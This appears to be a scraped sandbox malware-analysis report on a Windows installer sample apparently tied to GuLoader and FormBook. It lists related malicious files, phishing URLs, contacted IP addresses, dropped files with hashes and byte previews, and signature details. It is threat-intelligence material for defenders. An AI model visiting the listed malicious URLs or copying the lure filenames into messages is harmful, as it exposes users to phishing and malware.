                                                                                                                                                  • 91.195.240.117
                                                                                                                                                  sYfKrBVpjn.xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                  • 91.195.240.19
                                                                                                                                                  cLX08Rntoj.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                  • 91.195.240.19
                                                                                                                                                  cRmu9LROM09hq1F.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 91.195.240.19
                                                                                                                                                  Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                  • 91.195.240.19
                                                                                                                                                  INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 91.195.240.19
                                                                                                                                                  Quote_EXW..xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                  • 91.195.240.19
                                                                                                                                                  Mnp10GPUmthweWl.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 91.195.240.19
                                                                                                                                                  Bank_receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 91.195.240.19
                                                                                                                                                  SOA_PAYMENT_OCTOBER_2023.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 91.195.240.19
                                                                                                                                                  Shipment_Document_BL,INV_and_packing_list.jpg.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                  • 91.195.240.19
                                                                                                                                                  pedido.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                  • 91.195.240.19
                                                                                                                                                  Booking_amendment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 91.195.240.19
                                                                                                                                                  CLOUDFLARENETUShttps://track-mb.bra2hmail.com/click/km2251mz29c54/review/f22fac3853858d747fc9f2ef55b97ac097fe8f72Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                  • 104.17.2.184
                                                                                                                                                  toprakkcv.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.21.84.67
                                                                                                                                                  2y1JbYuXUD.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                  • 162.159.135.233
                                                                                                                                                  https://strava.app.link/69975S3p?%243p=e_et&%24original_url=https%3A%2F%2Fbaidu.com/link?url=UbcHBOKK7Y4gqxVzNd-QKUOphfIsBqn4bVRPqa0MNPU-0eELDTX3X3PjZBdc7Pt5&wd#.am9obi5zbWl0aEBlY2xlY3RpY2JhcnMuY28udWs=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.2.184
                                                                                                                                                  4.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 172.67.215.45
                                                                                                                                                  file.exeGet hashmaliciousGlupteba, LummaC Stealer, Meduza Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                  • 172.67.213.185
                                                                                                                                                  LmdaUpVCy2.exeGet hashmaliciousGlupteba, PrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                  • 162.159.130.233
                                                                                                                                                  https://fydtc3zin9urq8g.kyxfgpywfa.ru/flga9/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.2.184
                                                                                                                                                  https://sports-continent.com/newlove/stoopit/CSQTD/clowaterd@camosun.caGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.2.184
                                                                                                                                                  https://track-mb.bra2hmail.com/click/km2251mz29c54/review/3f84737b621ab26b4623b6c5301a79c4624a5f99Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.19.219.90
                                                                                                                                                  Signed_Today_Nov-17-2023-1.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 172.64.140.13
                                                                                                                                                  https://sites.google.com/view/westgrouplawpllc/homeGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                  • 104.21.95.68
                                                                                                                                                  Official copy 5660905 17 November, 2023.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.25.14
                                                                                                                                                  I6LOSz3ntW.exeGet hashmaliciousGlupteba, LummaC Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                                                                                                                                  • 162.159.130.233
                                                                                                                                                  https://r20.rs6.net/tn.jsp?f=001OD0JwB1Pf45JfKH6JC8CPfaRnRc3dCMxeq788K6zTWWLeuTziIrljVOB3NrAkxrdQWhrVMBC7sEGsK_ZNpcl1nZloFvHi2Y1fcOYRYlXVf_NftbS_YwJQVNgmjdS0hFIW3Sv0M8lDax_lqWRL7-vqXi5USS1A_aBD-qtXPwxOIU=&c=&ch=&__=a3Jvb25leUB1bml0ZWRvbmUub3Jn&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.2.184
                                                                                                                                                  file.exeGet hashmaliciousGlupteba, LummaC Stealer, Meduza Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                  • 172.67.132.29
                                                                                                                                                  SecuriteInfo.com.Trojan.GenericKD.70423744.25397.14383.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                  • 172.67.149.76
                                                                                                                                                  https://www.icloud.com/iclouddrive/05bCxFC6duvy_A1hmFv4eyYMQ#NEW-QUOTATIONGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 1.1.1.1
                                                                                                                                                  http://www.propertynoise.co.nzGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.18.214.59
                                                                                                                                                  LabyMod.exeGet hashmaliciousDCRat, zgRATBrowse
                                                                                                                                                  • 104.21.1.107
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19https://manowebsm1.s3.amazonaws.com/PaymentProof31332.urlGet hashmaliciousAmadeyBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  file.exeGet hashmaliciousGlupteba, LummaC Stealer, Meduza Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  I6LOSz3ntW.exeGet hashmaliciousGlupteba, LummaC Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  file.exeGet hashmaliciousGlupteba, LummaC Stealer, Meduza Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  SecuriteInfo.com.Trojan.GenericKD.70423744.25397.14383.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  BoletoNF0014217112023.pdf.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  SecuriteInfo.com.Win64.PWSX-gen.15914.1593.exeGet hashmaliciousVidar, zgRATBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  ud704TETEP.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRATBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  Yi5cWfHZhf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  XtDhwVrVKn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  exploreRemote_alphav4.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  Invoice_1-19580161#U00b7pdf.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  Systembackup.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  monscan.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  Watchercli.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  tsnsign.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 142.250.176.206
                                                                                                                                                  • 142.250.81.225
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\LangDLL.dllTransferencia-30.000,00 EURpdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                    Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                      Transferencia.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        EaseUSDataRecoveryWizardPortable_14.4.0.0_Multilingual.paf-RSLOAD.NET-.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dllTransferencia-30.000,00 EURpdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              Transferencia.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                Scan_Quotation_Order_Requet.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                  Scan_Quotation_Order_Requet.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                    9qxCT58nut.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                      9qxCT58nut.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                        tmp.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          tmp.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                            booking_#U0414#U043e#U043c#U043e#U0434#U0435#U0434#U043e#U0432#U043e_-_Price_2_Trucks_EURO_TRUCK.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              booking_#U0414#U043e#U043c#U043e#U0434#U0435#U0434#U043e#U0432#U043e_-_Price_2_Trucks_EURO_TRUCK.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                Wwhv0rbIoV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                  Wwhv0rbIoV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                    RFQ#110923-AQUA_CHEMICALS_.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                                                                                      RFQ#110923-AQUA_CHEMICALS_.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                        SecuriteInfo.com.Win32.Evo-gen.24531.21214.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                          SecuriteInfo.com.Win32.Evo-gen.24531.21214.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                            250.xlsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                              igucc.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):122880
                                                                                                                                                                                                Entropy (8bit):1.1414673161713362
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                                                                                                                                MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                                                                                                                                SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                                                                                                                                SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                                                                                                                                SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                                Entropy (8bit):3.8169285349163573
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:S46+/1TKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mLofjLl:zHuPbOBtWZBV8jAWiAJCdv2CmeL
                                                                                                                                                                                                MD5:08DE81A4584F5201086F57A7A93ED83B
                                                                                                                                                                                                SHA1:266A6ECC8FB7DCA115E6915CD75E2595816841A8
                                                                                                                                                                                                SHA-256:4883CD4231744BE2DCA4433EF62824B7957A3C16BE54F8526270402D9413EBE6
                                                                                                                                                                                                SHA-512:B72E7CEA5CE1F4DC64E65A1F683A3EF9E3FA2DC45CF421F569EB461F1FDCC0CAF4FF62A872E62B400579F567C6FF9FC3C2E6E020CDCA89D96015502C803A09B9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                • Filename: Transferencia-30.000,00 EURpdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Transferencia.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Transferencia.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: EaseUSDataRecoveryWizardPortable_14.4.0.0_Multilingual.paf-RSLOAD.NET-.exe, Detection: malicious, Browse
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L......`...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):12288
                                                                                                                                                                                                Entropy (8bit):5.737556724687435
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                                                                                                                                                                                MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                                                                                                                                                                                SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                                                                                                                                                                                SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                                                                                                                                                                                SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                • Filename: Transferencia-30.000,00 EURpdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Transferencia.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Transferencia.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Scan_Quotation_Order_Requet.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Scan_Quotation_Order_Requet.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: 9qxCT58nut.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: 9qxCT58nut.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: tmp.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: tmp.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: booking_#U0414#U043e#U043c#U043e#U0434#U0435#U0434#U043e#U0432#U043e_-_Price_2_Trucks_EURO_TRUCK.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: booking_#U0414#U043e#U043c#U043e#U0434#U0435#U0434#U043e#U0432#U043e_-_Price_2_Trucks_EURO_TRUCK.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Wwhv0rbIoV.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Wwhv0rbIoV.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: RFQ#110923-AQUA_CHEMICALS_.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: RFQ#110923-AQUA_CHEMICALS_.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: SecuriteInfo.com.Win32.Evo-gen.24531.21214.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: SecuriteInfo.com.Win32.Evo-gen.24531.21214.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: 250.xls, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: igucc.exe, Detection: malicious, Browse
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):254547
                                                                                                                                                                                                Entropy (8bit):7.698042659212664
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:lEWnLj3IlmhjM1wPakWbwIsw1Uo6crkCGMSeFMLPZ1nq:yu1g4xWMIP1UPAkJLB1q
                                                                                                                                                                                                MD5:A9D39AC5663990F6F1D45F1535E01838
                                                                                                                                                                                                SHA1:6503493640A5B3FD74F92DF5A438D8106D4961FD
                                                                                                                                                                                                SHA-256:6D817387110928E1F0109ABAB36EE3F8A0374B64281885AB7EAB4C66EE50AF63
                                                                                                                                                                                                SHA-512:049A9CDB512383118A0DA08F816B798F71188CABDAEE2AF5C6A7CBC38D481936EA617ED64010C3B7C2AF88AEDD5D724A72178F5F59A1CB132447E35A98CCA2FA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...............................Q....H..ccc...........e.............Y.I..........................Z.#.m...........................s.........H..............dddd.....................`............A....A.o.V...............qq.................[[................>>>....@@@@.............k..$$..eee....EE.................aaa.....................kkkk.JJ.............LLLL.........4..`.......L.O..X.U...44.....1111...................r...........&&&&..............."....vvv.XXXX....................................Q.......vv..........gg.....))).SS..................v.........~~~~.....aa...............................................................]].\............................5..PPP........]...........{{...P.....f.......K....7.............#.;;.........'.A.....'.......88.....................t..............XXXX.........kk......%.....l.....Y......rr...8.....b....~~.>...................aa.....8.6....NN....hhh......................''.....<..``......BBB.D............... .4...........X...b...............ZZZ.
                                                                                                                                                                                                Process:C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):6821
                                                                                                                                                                                                Entropy (8bit):4.888229633444558
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:NezHZ/ytaBiCeZzsQx0MiTiF9c9exHGysM:NezHdysk+QyHiF9MeT3
                                                                                                                                                                                                MD5:86F24C1690D1F9D4EB9CFD18408F3425
                                                                                                                                                                                                SHA1:8E4A9FFECFD97483FF43ADCC23D3375E0F7BCDDA
                                                                                                                                                                                                SHA-256:2C37295A81FA552CBDD7D1FF8A38909CB328B93F8C54D13D4CD766F5A2F8AC16
                                                                                                                                                                                                SHA-512:D0CD182C0FFFD8625F10C98424C42E5B1CB42A9FE0E71C55559FA98A145AECDA4B42DA772693DB4F942DDDB98EF4392C96B995DBA74E4E09B1CAF0D8A009AA14
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:|......N............iD....|Z...)N....9d..........{..[.[.aG...........s.......p.......6....._..-................eE[.f...S|........................!.........*...........`..4.Y.E..A.$..T...T.........?..L................A....p.s.............[...`.{....j.........U........W...........+.i....0"........x`....8...............^....J...}..=,.............(-<......................z......#. <=.....R..........~........R....6'.|...........n.............. ....Of.... ...........1....F..H..C....m........%.........w......... F............'.............j....,...........St....+..............<..............G........L...+.....Qyn.....g...................."............h...q..3.(A..z..........f..`.3....s.......(......!...z...............U.....*.+.........OI...#......................X....M............!...d.6........X.....M..........I.._.........X@S.....M....>..........9i..........s.........&......B~...j./.=................`.....dL...z......&....S..9C.................e1..~...G...@@........=h....z.<..
                                                                                                                                                                                                Process:C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2059
                                                                                                                                                                                                Entropy (8bit):4.857067730137871
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:LaJ5sfdVJ7jlaWQPlNxz20V2iBj7qHguUU:GJ5sfdr7AWQPlNxzRX4jUU
                                                                                                                                                                                                MD5:80E5114841BC875C6BDC5A8B8DCC8196
                                                                                                                                                                                                SHA1:D2414BF95C0ABA262C26B37AB3D4AF53544FBC66
                                                                                                                                                                                                SHA-256:BAD3875C0BF60281099B3EFDABE07A460BE74B352601368D83A7D222AB901521
                                                                                                                                                                                                SHA-512:29BBE6062AEF0D85253E0FE5F04C88A4B1D5F23A99461DE15E4AC3E719A1851386750F3D49A295419EDA9F4A993AECB6A72EBFFA4631D5EC933DF2C3544079FB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...Y.8................C.p=..........=...$.y.....,....g..\.5...*....q..7..b..o...kT.#.<.............6........S...S>.H...s......-..P.|<.N..|.....M....|......3..4.=..S................q............C........A...........pn.........%..@........A=-.....E."....vZ......../.w..xh.........A.z.......b."0.....y..2....%B......rF*............,B]................0.........[...g..oP...u..................j.Z.p..........>..........+..U..............Fy.:..O......F.........A.B..b....(o..s..........&H...S.V....H..^...H.Y.../.........FK.......K.a........,...K.....................:.S_W.j..R;........8....E..............P....M.............................31.............. ..%....K..........?$B.."........g.9..d........... ...w.....J.........).....*......r.........*.........C..............)..............A7X.......$.............x...V.N.|.t.o.G..p.....'.H....._..._........&.....j..+............m........q..H......#........Ey.....I........V....*............r..u.i....\..?...s...........Fm?....v...R.........../5.
                                                                                                                                                                                                Process:C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4613
                                                                                                                                                                                                Entropy (8bit):4.902319777797754
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:lP18xdD5jKZNjpKhrw22EmRje4QyJ6HbHCuf1czIJjehue:lPCxdD56KhErReyk7iufOzSj+ue
                                                                                                                                                                                                MD5:C0BD146E3A2904FA443331349D01004D
                                                                                                                                                                                                SHA1:DE94BCBFC02C4F4BDBC84C6192810CCFF85FE86D
                                                                                                                                                                                                SHA-256:0C3B43B502443DB330CFC0EF3EEB02A8782335823A4E7AC6A5A05ED07475BC65
                                                                                                                                                                                                SHA-512:0B6FA096B4DAA12F701FCE037B5EB4E145E8E2376A97292D38C7F717F0A1232F8A6D1E74F81617512C3EA6DCD22CA4A57403EC6605D4236D45BCF31592001F2E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:a...'%?..Z-.........(.x.p.....x..........jV........A0...2.P......K,.........?s...KB..Z...j.....E.....u...g.......4........G......vn...5..].........)...........*...2........,N....V.6..._.t....$....b.@.........4...S=.......j.......m.;.j...............kp........&8C...5..)..............|..........x-i..............X...'..................S..w.4.y..7............y.8.]6......>.#...O..e..........p.p%.............>.AP\.....$..J.W\l.....C.............c..).4..........(...x..#....>...b..z..........................@..M.~.;..$.......-.........+...X....B.................V........!.....j....v..................>..d........3.................g............./............................P..r...,.......m.-..\....t.........i........#.n...................5...].}....~...........*z................%...RA...X...9......(.E..J.G......n.....'......_...............L..........;k.`..#...*........@....1...l........(...5...........o.4..................XK.. r.l.D...v.....r...............`... .....j.X.=.......E....
                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                Entropy (8bit):7.2577573274247635
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:U6SJBLxT2Z.exe
                                                                                                                                                                                                File size:388'080 bytes
                                                                                                                                                                                                MD5:01e7d9fdc578b010ac4742a69874b8c9
                                                                                                                                                                                                SHA1:d2ebff34b92a345f5a5e19a87dbb96a96608f717
                                                                                                                                                                                                SHA256:bc27cfc934a295e4c380cf5a2e9b5cdb902339e4b2ca2e282c0fadc32e120feb
                                                                                                                                                                                                SHA512:de3885ec482553df13f85d232c263196309f8b3cd01f7f838b6b1392ec32fc1c27a91d1374ab4ed0249d04a4a6ffaa43a6a8705eafa60475bee0f00450b68ed9
                                                                                                                                                                                                SSDEEP:6144:bT4DtXRruNioYvDz1xsKFMmFR0aT3f82G+BE4A4DE8GANNi1:bTe+TE4p+BG21DPTs
                                                                                                                                                                                                TLSH:F784F191B255C8EBD85242B18C79EC523566BD2DA8B05A1F32A3770DB9B3383141BF1B
                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...P..`.................h.........
                                                                                                                                                                                                Icon Hash:2362606061b1636e
                                                                                                                                                                                                Entrypoint:0x4034c5
                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                Time Stamp:0x60FC9250 [Sat Jul 24 22:21:04 2021 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                Signature Issuer:E=Wishers@Olofs.Van, OU="Shetlandsponyer Brndstofs ", O=Hadefuldt, L=Guasti, S=California, C=US
                                                                                                                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                Error Number:-2146762487
                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                • 22/08/2023 06:09:02 21/08/2026 06:09:02
                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                • E=Wishers@Olofs.Van, OU="Shetlandsponyer Brndstofs ", O=Hadefuldt, L=Guasti, S=California, C=US
                                                                                                                                                                                                Version:3
                                                                                                                                                                                                Thumbprint MD5:59744D08EA3B9A3B6775F3D4B60A4DCF
                                                                                                                                                                                                Thumbprint SHA-1:83598AD2EEB9360F4E21F92061F54CFBE516D550
